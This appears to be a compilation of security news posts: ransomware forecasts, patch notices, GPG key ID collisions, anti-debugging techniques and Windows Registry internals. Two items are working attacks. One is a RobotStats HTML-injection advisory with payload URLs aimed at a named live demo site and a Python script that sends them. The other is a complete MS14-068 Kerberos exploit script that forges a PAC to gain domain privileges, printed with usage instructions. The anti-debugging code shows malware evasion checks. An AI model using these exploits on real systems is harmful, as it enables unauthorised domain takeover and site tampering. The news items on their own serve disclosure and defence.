caveat, Libicki forecasted that someone somewhere would certainly come up with a new way of monetizing information that no one in the panel, audience or world could possibly predict today. This, he said, is why it’s so hard to say what cybercrime will look like in the year 2020. Libicki later reasoned that it’s a wonder that so little ransomware attacks take place today. Moving away from consumer threats, he noted that the Iranians and the North Koreans seem to enjoy bricking computers. Bricking and ransomware are by no means the same, in that the former simply destroys machines while the latter renders one useless unless the user is willing to pay a fee. However the two attacks are similar in principle, in that they offer criminals the leverage of denying their victims’ access to the machines on which they rely – either permanently or temporarily. Rick Howard, the CSO of security firm Palo Alto Networks followed Libicky’s train of thought. He predicted that ransomware is also likely to become a favorite tool among hacktivist groups, merely seeking to disrupt operations or gain leverage in order to affect change. Howard further hammered the efficacy of ransomware, saying that the cybercrime business model is deeply concerned with customer service. 
Contrary to what many experts say and recommend, Howard said that ransomware perpetrators are very good at restoring service for any victims who decide to pay the ransom. “Ransomware is the future; it’s going to touch the consumer hard,” Howard said. “Banks cover credit card fraud. Just wait until [criminals] start poking you for $20 per month.” In reality, ransomware has already impacted the consumer in a deep way, some six years before the future date envisioned by the panelists. The CryptoLocker malware garnered heavy media attention earlier this year, and the opening remarks from the panel’s final member, Andrew Bonilla, the director of cybersecurity and public safety at Verizon Business, could suggest exactly why CryptoLocker was so exigent. “Every high-level instance of cybercrime has a street-level component at some point,” Bonilla explained. “When you start to put a face to cybercrime it starts to make a difference. We need to be able to see who and what is affected and who is responsible for it.” Source
  10. Microsoft made patch news on two fronts last month with an unusual emergency patch for a critical vulnerability in Kerberos, and with a missing fix for an Exchange bug that had been promised in its November advance notification. In the December advance notification, released today, an elevation of privilege bug in Exchange is listed among seven scheduled bulletins to be pushed out next Tuesday. The Exchange patch is rated important, one of four bulletins so rated by Microsoft; the remaining three are rated critical, meaning the likelihood of remote code execution and imminent exploit is high. Expect the Exchange patch to be MS14-075. The patch applies to Microsoft Exchange Server 2007 SP3, Exchange Server 2010 SP3, Exchange Server 2013 SP1 and Exchange Server 2013 Cumulative Update 6. No further details were made available by Microsoft. The three critical bulletins expected next week are topped off by another Internet Explorer rollup. The IE vulnerabilities addressed are rated moderate for IE 6, IE 7 and IE 8 running on Windows Server 2003 and Windows Server 2008. They are rated critical for remote code execution on Vista, Windows 7, Windows 8 and 8.1 for IE 7 and up. Another critical remote code execution bulletin is expected in Office software, starting with Microsoft Word 2007 SP3, as well as Microsoft Office 2010 SP2, Word 2010 SP2, Word 2013 and Word 2013 RT. Microsoft Office for Mac 2011 is also vulnerable, as are Microsoft Word Viewer and the Microsoft Office Compatibility Pack. Microsoft SharePoint Server 2010, 2013, and Microsoft Office Web Apps 2010 and 2013 are also covered by this bulletin, but those vulnerabilities are rated important. Two other bulletins patch remote code execution vulnerabilities in Office but are rated important, meaning there is some mitigating circumstance; for example, an attacker would need local access or legitimate credentials to exploit the flaw. “With the balance of next week’s bulletins impacting Windows, December will be a month for IT to focus on the desktop,” said Russ Ernst of Lumension. The final critical bulletin covers remote code execution vulnerabilities in Windows Vista. The flaw is rated important for all other Windows Server versions. Windows Server 2003 users, meanwhile, are on notice that support for the platform runs out July 14, 2015. As the year winds down, the number of critical bulletins is down. Microsoft is on track for 29 critical bulletins this year, compared to 42 last year and 35 the year before. IT shops will have 83 bulletins to contend with this year, down from 105 in 2013, Lumension said. Source
  11. There is an easily exploitable remote code execution vulnerability in a popular WordPress plugin that helps manage file downloads and researchers say the bug could be used by even a low-level attacker to run arbitrary code on a vulnerable site. The vulnerability is in the WP Download Manager, versions 2.7.4 and lower, and it could be used to implant a backdoor on a vulnerable site or get access to administrative accounts. Researchers at Sucuri discovered the vulnerability and a fixed version of the WP Download Manager plugin was released earlier this week. “The plugin used a custom method to handle certain types of Ajax requests which could be abused by an attacker to call arbitrary functions within the application’s context. There were no permission checks before handling these special Ajax calls. This allowed a malicious individual (with a minimal knowledge of WordPress internals) to inject a backdoor on the remote site or to change the administrator’s password if the name of his account was known. As this function is hooked to the ‘wp’ hook (which is executed every single time somebody visits a post/page), it could be abused by anyone,” Mickael Nadeau of Sucuri wrote in an analysis of the bug. WordPress is one of the more popular content management systems in use today and is used both by individuals for small Web sites and by businesses for much larger sites. Attackers often target WP sites that are running vulnerable versions of the software and WordPress sites have been hit by mass code-injection attacks in the past. The bug in WP Download Manager is caused by an Ajax function that didn’t enforce permission checks. “Any WordPress based website running the WP Download Manager version would be susceptible to remote code execution. Allowing an attacker to inject a backdoor and change important credentials, like admin accounts,” Nadeau said. Users running a vulnerable version should update to WP Download Manager 2.7.5. Source
  12. Apple has pulled a batch of security updates for Safari that it initially released yesterday. The updates were set to address several usability and security issues in the browser, including some that could have led to code execution and data exfiltration. While notes for the patches are still published in the security section of Apple’s support site, the actual update has disappeared from Apple’s Software Update mechanism, suggesting that the fixes were not ready for the public. Whenever it’s made public, the update will affect three builds of Safari: 6.2.1, 7.1.1, and 8.0.1, on Lion, Mavericks, and Yosemite OS X, respectively. Ultimately three WebKit issues will be fixed with the update. The first fixes an issue with style sheets that are loaded cross-origin, something that could lead to data exfiltration if a CSS file was loaded by a Scalable Vector Graphics (SVG) image in an img element. In the update the browser fine-tunes how external CSS files are blocked. Apple credits Rennie deGraaf of iSEC Partners for digging up this particular bug. The second fix remedies an issue discovered by Jordan Milne, a Canadian web security consultant, where any website that frames malicious content could have triggered UI spoofing. The last issue could have led to unexpected application termination or arbitrary code execution if a user visited a malicious website. This issue, due to several memory corruption problems, 11 CVEs in total, was fixed through improved memory handling. Before it was pulled, the update was also said to have fixed an issue that prevented history from being synced across devices if iCloud was turned off, and one that prevented saved passwords from being auto-filled. The update is also said to enhance Safari’s WebGL graphics on Retina displays. While Apple has been known to pull back updates from time to time, it’s unclear when exactly the patches will resurface in Software Update. In late September, shortly after it released the iPhone 6, the company pulled back an iOS update (8.0.1) that wound up disabling cellphone service and TouchID on a number of iPhones. Apple eventually pushed an update to the update the next day and later blamed the snag on software distribution issues. Email requests for comment to Apple were not immediately returned on Thursday. Source
  13. Attack and vulnerability details are often disclosed in order to prompt vendors and project maintainers into action. It happened recently with the publication of attack code that mimicked the work of Karsten Nohl on BadUSB and tried to nudge Phison Electronics of Taiwan into looking at its USB firmware. It has happened before with Microsoft vulnerabilities, where disclosures are made when there’s a perception the vendor is sitting on a vulnerability for too long. Over the summer, two researchers presented research at DEF CON on GPG collision attacks that resulted in their own call to action: stay away from 32-bit key IDs in GPG. Using a tool they built called Scallion, Eric Swanson and Richard Klafter need just four seconds to generate colliding 32-bit key IDs on a GPU. “Key servers do little verification of uploaded keys and allow keys with colliding 32bit ids,” they wrote in a blogpost in July. “Further, GPG uses 32bit key ids throughout its interface and does not warn you when an operation might apply to multiple keys.” While this weakness in GPG keys has been known since at least 2011, a secondary call to action in this scenario is directed at the maintainers of GPG: fix your UX, or user experience. “The core of GPG’s crypto is 100 percent rock solid,” Swanson said. “However, like a lot of tools, GPG has fairly atrocious UX. When attacking security, it’s almost always best to attack the user. These short key id collisions are a way to do that.” Swanson and Klafter concluded through their research that they can create a collision for every 32-bit key ID in the Web of Trust strong set, putting GPG’s long-term viability at risk. “GPG’s interface has needed an update for a long time. The goal of our project was to further demonstrate this need,” Klafter said. “I am positive there is enough passion for privacy and the GPG project itself that it will get the update it needs.” Simon Josefsson, a member of the GPG support team, said UX work is up to each application developer. “I’m sure that all applications that use short keyids should have some kind of thinking happening due to the evil32 issue, but whether it happens or not depends on the authors of the respectively project,” he said. GPG, short for GNU Privacy Guard, is a free OpenPGP implementation, and it’s used to encrypt and sign data and communications. In their DEF CON presentation, Swanson and Klafter also disclosed some information on a vulnerability in GPG wherein the recv-key operation with a full fingerprint does not verify that the received key matches the fingerprint. GPG issued a patch Aug. 29 that mitigates potential man-in-the-middle attacks exploiting this situation. Swanson and Klafter hope the project continues on and addresses the collision issue. “There are a variety of ways to address this, but most strongly, GPG should switch to using at least 64-bit key IDs by default, and warn you whenever it detects a collision in a displayed key ID (either 32-bit or 64-bit),” Swanson said. Swanson urges organizations using GPG to be careful with receiving keys, and to use gpg --fingerprint to verify key exchanges. The availability of tools such as Scallion allows for the rapid computation of key IDs, which, even on older hardware, can try around 400 million keys per second, he said. “Despite its interface, GPG is still an excellent piece of software used everywhere from email encryption to software package verification,” Klafter said.
“Its encryption is rock solid and I would still recommend GPG over other encryption tools, just make sure to check your full fingerprints.” Source
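To make the 32-bit weakness concrete: for a V4 key, the short key ID is simply the low 32 bits of the 160-bit SHA-1 fingerprint (the long ID is the low 64 bits), so only about 2^32 short IDs exist and a GPU search can produce a colliding key quickly. Below is a minimal sketch of that relationship; the fingerprint shown is made up purely for illustration.

def key_ids(fingerprint_hex):
    """Derive the long (64-bit) and short (32-bit) key IDs from a V4 key fingerprint."""
    fpr = fingerprint_hex.replace(' ', '').upper()
    long_id = fpr[-16:]    # low 64 bits of the SHA-1 fingerprint
    short_id = fpr[-8:]    # low 32 bits; only ~4.3 billion possibilities exist
    return long_id, short_id

# Made-up fingerprint, for illustration only.
print(key_ids('0123 4567 89AB CDEF 0123 4567 89AB CDEF 0123 4567'))

This is why the researchers recommend displaying at least 64-bit IDs and always verifying the full fingerprint when exchanging keys.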
14. # Title : RobotStats v1.0 HTML Injection Vulnerability
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home : http://milw00rm.com / it's online
# Twitter : https://twitter.com/milw00rm or @milw00rm
# Date : 22.11.2014
# Demo : http://alpesoiseaux.free.fr/robotstats/
# Download : http://www.robotstats.com/en/robotstats.zip
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
# Birkaciyiadam (greets) : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (in alphabetical order)

Desc.: There is no security on the admin folder (no session control or login panel; arguably a separate vulnerability) and no filtering of HTML in robots.lib.php, so you can inject HTML or XSS code.

HTML injection:

target.com/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=

Then go to:

target.com/robotstats/info-robot.php?robot=(robot id)

or

target.com/robotstats/admin/robots.php

and you will see your HTML page.

Analysis (/admin/robots.php):

include "robots.lib.php"; //line 26

else if ($rub == "ajouter")
{
    updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url); //line 65 (this function is analysed in robots.lib.php below)
}

Analysis (/admin/robots.lib.php): Looking at the code, you will see a blank check for "name" and "user agent", but no filter against injection (see line 203: no filtering at all).

function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url) //line 163 (called from line 65 in robots.php)
{
    global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;

    // dans tous les cas :
    echo "<p class='normal'><a class='erreur'> ";
    $msg = "";

    // test du nom
    if ($nom == '') //line 172 checks only whether the name is blank
    {
        $msg = $RS_LANG["BadRobotName"];
    }

    // test selon le mode de detection
    if ($detection == $RS_DETECTION_USER_AGENT) //line 178 checks the chosen detection mode
    {
        if ($user_agent == '') //line 180 checks only whether the user agent is blank
        {
            $msg = $RS_LANG["BadUserAgent"];
        }
    }
    else if ($detection == $RS_DETECTION_IP) //line 185 checks the chosen detection mode
    {
        if ( ($ip1 == '') && ($ip2 == '') ) //line 187 checks the ip1 and ip2 values
        {
            $msg = $RS_LANG["IPNotSpecified"];
        }
    }
    else
    {
        $msg = $RS_LANG["BadDetectionMode"];
    }

    if ($msg != "")
    {
        echo $msg;
    }
    else
    {
        $liste_champs = "nom, actif, user_agent, ip1, ip2, detection, descr_fr, descr_en, url"; // line 203 no filtering of the values
        $liste_valeurs = "\"$nom\", \"$actif\", \"$user_agent\", \"$ip1\", \"$ip2\", \"$detection\", \"$descr_fr\", \"$descr_en\", \"$url\"";

        if ($robot > 0) // cas d'une modification et non d'un ajout //line 205 update an existing bot rather than add a new one
        {
            $liste_champs .= ", id";
            $liste_valeurs .= ", '$robot'";
            $sql = "REPLACE INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)";
            $res = mysql_query($sql) or erreurServeurMySQL($sql);
            echo $RS_LANG["RobotUpdated"];
        }
        else
        {
            $sql = "INSERT INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)";
            $res = mysql_query($sql) or erreurServeurMySQL($sql);
            echo $RS_LANG["RobotAdded"];
        }
    }
}

Demo:

http://alpesoiseaux.free.fr/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=

Then go to:

http://alpesoiseaux.free.fr/robotstats/info-robot.php?robot=(robot id)

or

http://alpesoiseaux.free.fr/robotstats/admin/robots.php

and you will see your HTML page.

Source
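For readers who prefer to script the proof of concept rather than paste the URL into a browser, here is a minimal Python sketch of the same unauthenticated request. The host name is a placeholder, and the parameter values are taken from the advisory; only test against an install you are authorised to assess.

import urllib.parse
import urllib.request

# Placeholder host: substitute a RobotStats 1.0 installation you are allowed to test.
base = 'http://target.example/robotstats/admin/robots.php'

params = {
    'rub': 'ajouter',
    'nom': '<font color=red size=10><body bgcolor=black>NiCKNAME',
    'actif': '1',
    'user_agent': 'writeanything',
    'ip1': '',
    'ip2': '',
    'detection': 'detection_user_agent',
    'descr_fr': '',
    'descr_en': '',
    'url': '',
}

# The vulnerable script accepts this GET with no session check and stores the
# unfiltered HTML, which is later echoed back by info-robot.php and robots.php.
poc = base + '?' + urllib.parse.urlencode(params)
print(poc)
response = urllib.request.urlopen(poc)
print(response.getcode())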
15. #!/usr/bin/python
# MS14-068 Exploit
# Author
# ------
# Sylvain Monne
# Contact : sylvain dot monne at solucom dot fr
# http://twitter.com/bidord

import sys, os
from random import getrandbits
from time import time, localtime, strftime

from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache
from kek.crypto import generate_subkey, ntlm_hash, RC4_HMAC, HMAC_MD5
from kek.krb5 import build_as_req, build_tgs_req, send_req, recv_rep, \
    decrypt_as_rep, decrypt_tgs_rep, decrypt_ticket_enc_part, iter_authorization_data, \
    AD_WIN2K_PAC
from kek.pac import build_pac, pretty_print_pac
from kek.util import epoch2gt, gt2epoch


def sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b,
           target_realm, target_service, target_host, output_filename,
           krbtgt_a_key=None, trust_ab_key=None, target_key=None):
    sys.stderr.write(' [+] Building AS-REQ for %s...' % kdc_a)
    sys.stderr.flush()
    nonce = getrandbits(31)
    current_time = time()
    as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request=False)
    sys.stderr.write(' Done!\n')

    sys.stderr.write(' [+] Sending AS-REQ to %s...' % kdc_a)
    sys.stderr.flush()
    sock = send_req(as_req, kdc_a)
    sys.stderr.write(' Done!\n')

    sys.stderr.write(' [+] Receiving AS-REP from %s...' % kdc_a)
    sys.stderr.flush()
    data = recv_rep(sock)
    sys.stderr.write(' Done!\n')

    sys.stderr.write(' [+] Parsing AS-REP from %s...' % kdc_a)
    sys.stderr.flush()
    as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
    session_key = (int(as_rep_enc['key']['keytype']), str(as_rep_enc['key']['keyvalue']))
    logon_time = gt2epoch(str(as_rep_enc['authtime']))
    tgt_a = as_rep['ticket']
    sys.stderr.write(' Done!\n')

    if krbtgt_a_key is not None:
        print >> sys.stderr, as_rep.prettyPrint()
        print >> sys.stderr, as_rep_enc.prettyPrint()
        ticket_debug(tgt_a, krbtgt_a_key)

    sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_a)
    sys.stderr.flush()
    subkey = generate_subkey()
    nonce = getrandbits(31)
    current_time = time()
    # Forged PAC placed into the TGS-REQ; the MS14-068 flaw makes the KDC accept it.
    pac = (AD_WIN2K_PAC, build_pac(user_realm, user_name, user_sid, logon_time))
    tgs_req = build_tgs_req(user_realm, 'krbtgt', target_realm, user_realm, user_name,
                            tgt_a, session_key, subkey, nonce, current_time, pac, pac_request=False)
    sys.stderr.write(' Done!\n')

    sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_a)
    sys.stderr.flush()
    sock = send_req(tgs_req, kdc_a)
    sys.stderr.write(' Done!\n')

    sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_a)
    sys.stderr.flush()
    data = recv_rep(sock)
    sys.stderr.write(' Done!\n')

    sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_a)
    tgs_rep, tgs_rep_enc = decrypt_tgs_rep(data, subkey)
    session_key2 = (int(tgs_rep_enc['key']['keytype']), str(tgs_rep_enc['key']['keyvalue']))
    tgt_b = tgs_rep['ticket']
    sys.stderr.write(' Done!\n')

    if trust_ab_key is not None:
        pretty_print_pac(pac[1])
        print >> sys.stderr, tgs_rep.prettyPrint()
        print >> sys.stderr, tgs_rep_enc.prettyPrint()
        ticket_debug(tgt_b, trust_ab_key)

    if target_service is not None and target_host is not None and kdc_b is not None:
        sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_b)
        sys.stderr.flush()
        subkey = generate_subkey()
        nonce = getrandbits(31)
        current_time = time()
        tgs_req2 = build_tgs_req(target_realm, target_service, target_host, user_realm, user_name,
                                 tgt_b, session_key2, subkey, nonce, current_time)
        sys.stderr.write(' Done!\n')

        sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_b)
        sys.stderr.flush()
        sock = send_req(tgs_req2, kdc_b)
        sys.stderr.write(' Done!\n')

        sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_b)
        sys.stderr.flush()
        data = recv_rep(sock)
        sys.stderr.write(' Done!\n')

        sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_b)
        tgs_rep2, tgs_rep_enc2 = decrypt_tgs_rep(data, subkey)
        sys.stderr.write(' Done!\n')
    else:
        tgs_rep2 = tgs_rep
        tgs_rep_enc2 = tgs_rep_enc

    sys.stderr.write(' [+] Creating ccache file %r...' % output_filename)
    cc = CCache((user_realm, user_name))
    tgs_cred = kdc_rep2ccache(tgs_rep2, tgs_rep_enc2)
    cc.add_credential(tgs_cred)
    cc.save(output_filename)
    sys.stderr.write(' Done!\n')

    if target_key is not None:
        print >> sys.stderr, tgs_rep2.prettyPrint()
        print >> sys.stderr, tgs_rep_enc2.prettyPrint()
        ticket_debug(tgs_rep2['ticket'], target_key)


# Pretty print full ticket content
# Only possible in a lab environment when you already know krbtgt and/or service keys
def ticket_debug(ticket, key):
    try:
        ticket_enc = decrypt_ticket_enc_part(ticket, key)
        print >> sys.stderr, ticket.prettyPrint()
        for ad in iter_authorization_data(ticket_enc['authorization-data']):
            print >> sys.stderr, 'AUTHORIZATION-DATA (type: %d):' % ad['ad-type']
            if ad['ad-type'] == AD_WIN2K_PAC:
                pretty_print_pac(str(ad['ad-data']))
            else:
                print >> sys.stderr, str(ad['ad-data']).encode('hex')
    except Exception as e:
        print 'ERROR:', e


if __name__ == '__main__':
    from getopt import getopt
    from getpass import getpass

    def usage_and_exit():
        print >> sys.stderr, 'USAGE:'
        print >> sys.stderr, '%s -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>' % sys.argv[0]
        print >> sys.stderr, ''
        print >> sys.stderr, 'OPTIONS:'
        print >> sys.stderr, ' -p <clearPassword>'
        print >> sys.stderr, ' --rc4 <ntlmHash>'
        sys.exit(1)

    opts, args = getopt(sys.argv[1:], 'u:s:d:p:', ['rc4='])
    opts = dict(opts)
    if not all(k in opts for k in ('-u', '-s', '-d')):
        usage_and_exit()
    user_name, user_realm = opts['-u'].split('@', 1)
    user_sid = opts['-s']
    kdc_a = opts['-d']

    if '--rc4' in opts:
        user_key = (RC4_HMAC, opts['--rc4'].decode('hex'))
        assert len(user_key[1]) == 16
    elif '-p' in opts:
        user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest())
    else:
        user_key = (RC4_HMAC, ntlm_hash(getpass('Password: ')).digest())

    target_realm = user_realm
    target_service = target_host = kdc_b = None
    filename = 'TGT_%s@%s.ccache' % (user_name, user_realm)

    user_realm = user_realm.upper()
    target_realm = target_realm.upper()

    sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm,
           target_service, target_host, filename)

Source
16. Malicious software is able to detect whether it is running within a debugging environment or whether a debugger has been attached to the process, and will then refrain from exhibiting its malicious behaviour in order to avoid detection by the security analyst or whoever is attempting to debug the process. In this article, I'm going to describe some of the common anti-debugging techniques which are used to detect the presence of a debugger.

NtGlobalFlag:

The NtGlobalFlag field is located within the Process Environment Block (PEB) at offset 0x68 on x86 Windows, and at offset 0xBC on x64 Windows. The default value is 0, and it does not change merely because a debugger is attached to a running process; however, several of its flags are changed when a process is created by a debugger, and those can be used to detect one. NtGlobalFlag contains many flags which affect the running of a process. The most common flags set when a debugger creates a process are the heap-checking flags:

FLG_HEAP_ENABLE_TAIL_CHECK (0x10)
FLG_HEAP_ENABLE_FREE_CHECK (0x20)
FLG_HEAP_VALIDATE_PARAMETERS (0x40)

I've spoken about the purpose of these flags in a previous blog post which can be found here. These flags can be checked to detect the presence of a debugger. The general code from CodeProject for checking the above flags:

unsigned long NtGlobalFlags = 0;

__asm
{
    mov eax, fs:[30h]       ; PEB
    mov eax, [eax + 68h]    ; NtGlobalFlag
    mov NtGlobalFlags, eax
}

if(NtGlobalFlags & 0x70)    // 0x70 = FLG_HEAP_ENABLE_TAIL_CHECK |
                            //        FLG_HEAP_ENABLE_FREE_CHECK |
                            //        FLG_HEAP_VALIDATE_PARAMETERS
{
    // Debugger is present
    MessageBox(NULL, TEXT("Please close your debugging application and restart the program"),
               TEXT("Debugger Found!"), 0);
    ExitProcess(0);
}

// Normal execution

IsDebuggerPresent():

IsDebuggerPresent() is a Kernel32 function which returns TRUE if a debugger is attached to the process; its use can be spotted by checking the IAT. The same check can be done manually by reading the BeingDebugged field of the PEB:

char IsDbgPresent = 0;

__asm
{
    mov eax, fs:[30h]       ; PEB
    mov al, [eax + 2h]      ; BeingDebugged
    mov IsDbgPresent, al
}

if(IsDbgPresent)
{
    MessageBox(NULL, TEXT("Please close your debugging application and restart the program"),
               TEXT("Debugger Found!"), 0);
    ExitProcess(0);
}

// Normal Execution

CheckRemoteDebuggerPresent() is a similar function, and its use can be detected with the same method.

NtSetInformationThread() - Thread Hiding:

The NtSetInformationThread() function has an undocumented parameter called ThreadHideFromDebugger (0x11), which can be used to prevent any debugging events from being sent to the debugger. Debugging events are events which notify the debugger, such as the creation of new threads, the generation of an exception, the loading and unloading of DLLs, and the creation of child processes. You can check whether this function is imported in the IAT; PeStudio or a similar program like PE-bear can check for this function.

Execution Timing:

This is a simple idea: execution is slightly slower in the presence of a debugger, so by measuring execution time and comparing it against what is usual, the use of a debugger can be inferred. The common instructions used for this include RDTSC, RDPMC and RDMSR. GetTickCount(), GetLocalTime() and GetSystemTime() are all Kernel32 functions that can be used for the same purpose. Again, you can check whether these functions are imported within the IAT.

Software Breakpoint Detection:

The instruction 0xCC (INT 3) is used to stop the execution of the debugged process and pass control to the debugger. The original instruction byte is saved before the breakpoint is written. Any comparison instructions (CMP, CMPXCHG) which use this byte as an operand, scanning the code for 0xCC, can be considered an anti-debugging technique.

Source: link
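To show how a couple of the checks above look when scripted rather than written in C, here is a small Windows-only sketch that calls IsDebuggerPresent() and CheckRemoteDebuggerPresent() through ctypes, plus a crude timing check in the spirit of the GetTickCount() approach; the 50 ms threshold and the loop size are arbitrary example values, not anything prescribed by the post.

import ctypes
import time

kernel32 = ctypes.windll.kernel32   # only available on Windows

# Direct API check: non-zero if a user-mode debugger is attached to this process.
if kernel32.IsDebuggerPresent():
    print('IsDebuggerPresent: debugger attached')

# CheckRemoteDebuggerPresent() reports its answer through a BOOL output parameter.
present = ctypes.c_int(0)
kernel32.CheckRemoteDebuggerPresent(kernel32.GetCurrentProcess(), ctypes.byref(present))
if present.value:
    print('CheckRemoteDebuggerPresent: debugger attached')

# Crude timing check: a single-stepped or breakpointed loop takes far longer
# than the same loop running free. Threshold chosen purely for illustration.
start = time.perf_counter()
for _ in range(100000):
    pass
elapsed = time.perf_counter() - start
if elapsed > 0.05:
    print('Timing check: execution suspiciously slow (possible debugger)')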
17. Exploring the Windows Registry Part 1

The Registry is a key component of the Windows operating system, and it has always been recommended that you should never carelessly run Registry cleaners or start changing or deleting keys whose purpose you do not fully understand. You never seem to find much information about the Registry in general unless it's in specialist blogs or computer science papers. In this blog post I hope to show how to explore the Registry using WinDbg and look at some of its internal workings.

The Registry is managed by the Configuration Manager, which is its technical name inside the kernel, although the Registry tends to be referred to by that name far less commonly. As the name suggests, the Configuration Manager mainly maintains the configuration data for the operating system and any programs which may have been installed.

The Registry is divided into several sections called Rootkeys. The Rootkeys are defined as follows:

HKEY_LOCAL_MACHINE
HKEY_CURRENT_CONFIG
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_PERFORMANCE_DATA
HKEY_USERS

Each Rootkey has a number of Hives which are subdivided into Keys and Values. This can be seen when viewing the Registry with the Registry Editor.

HKEY_LOCAL_MACHINE contains the BCD (Boot Configuration Data), COMPONENTS, HARDWARE, SAM, SECURITY, SOFTWARE and SYSTEM hives. Any changes here will apply to the entire system.

The HKEY_CURRENT_CONFIG contains information relating to Hardware Profiles, which enables configurable driver settings. A Hardware Profile may change from boot to boot, and will be used by any programs which require it.

The HKEY_CLASSES_ROOT contains information for file extension associations, COM class registration and UAC (User Account Control).

The HKEY_CURRENT_USER contains the configuration data for the locally logged-on user. This Rootkey is mapped to the Ntuser.dat file which is present on the hard drive. Some examples of this local configuration data include environment variables, network settings, software settings and session information.

The HKEY_USERS contains the data required for each loaded user profile, and will be used by Winlogon to apply any user-specific changes. This section also contains keys relating to the security identifiers for those profiles.

The HKEY_PERFORMANCE_DATA contains operating system and server performance counters, and is not visible through the Registry Editor. These performance counters are only available through the Windows Registry API.

The HKEY prefix is used to represent a handle to the Rootkey.

Now that we have looked at the general logical structure of the Windows Registry, we need to examine its actual implementation on the hard disk. This is achieved through the concepts of Hives, Cells and Bins. It is also possible to examine parts of the Registry in physical memory.

The structure of a Configuration Manager Hive can be seen with WinDbg using the _CMHIVE data structure. It's a large data structure, and therefore I have omitted some of the fields. This data structure contains a larger sub-structure called _HHIVE, which holds some very useful information. The _CMHIVE structure is allocated from paged pool and has the pool tag CM10. You can view this pool allocation information with !pooltag and !poolfind. Using the !poolfind extension with the pool tag and specifying the pool type as paged pool with the 1 switch, we can see all the pool allocations for that specific pool tag.

A Hive is simply the on-disk representation of the Registry; each one has its own registry tree which serves as its root.
The loaded hives are listed under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist. These Hives are stored on the hard disk and are linked to the Registry file paths as seen below. Most of the hives reside in the System32 folder, whereas the others reside in the UserProfiles and Users folders. Alternatively, we can view the hive list within WinDbg using the !reg hivelist extension.

You may have noticed that the HARDWARE hive does not have a file path; this is because it is rebuilt every time the computer is booted, and is therefore only present in memory.

We can even view the current paged pool consumption of the Registry Hives using the !reg dumppool extension. Again I've had to omit some information due to size limitations. Using Process Explorer, and then selecting the System process, we can view the hive handles which are currently opened by the System process.

Going back to the general structure of how Hives are organised: Hives are linked together in a doubly linked list. The head of this linked list can be found with WinDbg; the address is 8336e44c on x86 in this dump, though I'm not sure whether it differs on x64. We can also see this with the _CMHIVE structure and its HiveList field. The addresses within the linked list are all virtual addresses.

In the second part I will be taking a closer look at the structure of Hives and some more forensic analysis techniques.

Source : BSODTutorials: Exploring the Windows Registry Part 1

Exploring the Windows Registry Part 2

Each Hive is divided into a number of allocation units called Blocks; the first block of a Hive is called the Base Block. The information stored within a Hive is organised into Cells, which contain active registry data such as keys, values, security descriptors and subkeys. Hive Blocks are allocated in 4096-byte units called Hive Bins. The Base Block may also be referred to as the Registry Header, with the other blocks being called Hive Bins. Each Hive Bin is then divided further into Cells as explained above.

A Hive Bin has the hbin signature, which can be found with WinDbg. Firstly, use the !reg hivelist extension, and then use the !reg viewlist extension with the desired hive address. The !reg viewlist extension lists the mapped views for the selected hive. I wasn't able to find a dump file which had any mapped views, therefore I won't be able to show the steps completely. Once you have used the !reg viewlist extension, use the db command on a desired view to display the contents of a bin. The _HHIVE data structure contains a Signature field and a BaseBlock field as described earlier. Each Hive Bin contains a pointer to the next Hive Bin and to the first Hive Bin. We can find free Hive Bins with the !reg freebins extension and the hive address.

Hive Bins are really only containers for Cells, which hold registry information such as keys, security descriptors, subkey lists and key values. There are a few different types of Cells:

Key Cell
Value Cell
Subkey-list Cell
Value-list Cell
Security-Descriptor Cell

The Key Cell contains the registry key and may also be called the Key Node. A Key Cell contains the kn signature for keys and kl for link nodes. Furthermore, the Key Cell maintains timestamp information about the latest update to that key, along with various Cell Indexes which describe additional information.
The Value Cell contains information about the key's value, and has a Cell Index pointing to the cell which contains that key's data. Its signature is kv.

The Subkey-list Cell contains a list of Cell Indexes for Key Cells which all share a common parent key. The Value-list Cell is the same, but applies to Value Cells rather than Key Cells.

The Security-Descriptor Cell has the ks signature and a reference count which tracks the number of Key Nodes (Key Cells) sharing the Security Descriptor it contains.

We can view Cell data structures with _CM_CELL_DATA, using the -r switch to dump all the nested sub-structures. The -r switch is really useful for data structures in general, especially since Microsoft doesn't fully document some sub-fields.

